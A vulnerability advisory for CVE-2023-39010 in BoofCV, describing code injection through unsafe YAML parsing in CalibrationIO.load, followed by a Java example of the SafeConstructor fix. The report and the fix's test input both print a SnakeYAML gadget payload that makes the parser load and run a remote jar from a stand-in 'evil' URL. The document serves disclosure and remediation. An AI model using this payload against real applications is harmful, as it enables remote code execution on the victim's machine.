CVE-2023-39010: In 0.42 and before there's a code injection vulnerability of `boofcv.io.calibration.CalibrationIO.load` · Issue #406 · lessthanoptimal/BoofCV

BoofCV 0.42 was discovered to contain a code injection vulnerability via the component boofcv.io.calibration.CalibrationIO.load. This vulnerability is exploited by loading a crafted camera calibration file.

Affected Version
Versions including 0.42 and below.

Describe the vulnerability
boofcv.io.calibration.CalibrationIO.load(String) is designed to load camera calibration configurations. However, passing an unchecked argument to this API can lead to the execution of arbitrary code. For instance, if we use CalibrationIO.load("example.yaml") to load camera calibration while the file "example.yaml" contains the following content:

!!javax.script.ScriptEngineManager [
    !!java.net.URLClassLoader [[
        !!java.net.URL [
            "http://example.com/evil.jar"
        ]
    ]]
]

malicious code in the evil.jar could be executed.

To Reproduce
Just executing CalibrationIO.load("PoC.yaml"); would reproduce it.

Fix Suggestion
Using new Yaml(new SafeConstructor()) can fix it.
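
The suggested fix, shown as an added example that is not part of the original issue or of BoofCV's code: a loader built on SnakeYAML's SafeConstructor rejects the reported document and still accepts a plain mapping. It assumes SnakeYAML 2.x on the classpath; the class name `SafeCalibrationLoad`, the method `loadCalibration` and the keys in the benign sample are hypothetical.

```java
import java.util.Map;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class SafeCalibrationLoad {
    // Constructed input: the document shape from the report above.
    static final String UNTRUSTED = String.join("\n",
        "!!javax.script.ScriptEngineManager [",
        "  !!java.net.URLClassLoader [[",
        "    !!java.net.URL [\"http://example.com/evil.jar\"]",
        "  ]]",
        "]");

    // Constructed input: hypothetical keys, not BoofCV's real calibration schema.
    static final String BENIGN = "model: pinhole\nwidth: 640\nheight: 480\nfx: 525.0\n";

    /** Parses with SafeConstructor, which builds only standard YAML types. */
    static Map<?, ?> loadCalibration(String text) {
        // SnakeYAML 2.x signature; on 1.x the no-argument SafeConstructor() applies.
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        Object root;
        try {
            root = yaml.load(text);
        } catch (YAMLException e) {
            // Global tags such as !!javax.script.ScriptEngineManager have no
            // constructor registered here, so no class named in the file is instantiated.
            throw new IllegalArgumentException("rejected calibration file: " + e.getMessage(), e);
        }
        if (!(root instanceof Map)) {
            throw new IllegalArgumentException("calibration root must be a mapping");
        }
        return (Map<?, ?>) root;
    }

    public static void main(String[] args) {
        System.out.println("benign -> " + loadCalibration(BENIGN));
        try {
            loadCalibration(UNTRUSTED);
            System.out.println("untrusted -> loaded (unexpected)");
        } catch (IllegalArgumentException e) {
            System.out.println("untrusted -> " + e.getMessage());
        }
    }
}
```

Checking that the root is a mapping catches files that parse safely but are not calibration data at all, such as a bare scalar or list.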

Related news

GHSA-99p5-qpqx-mhwc: Code injection in BoofCV
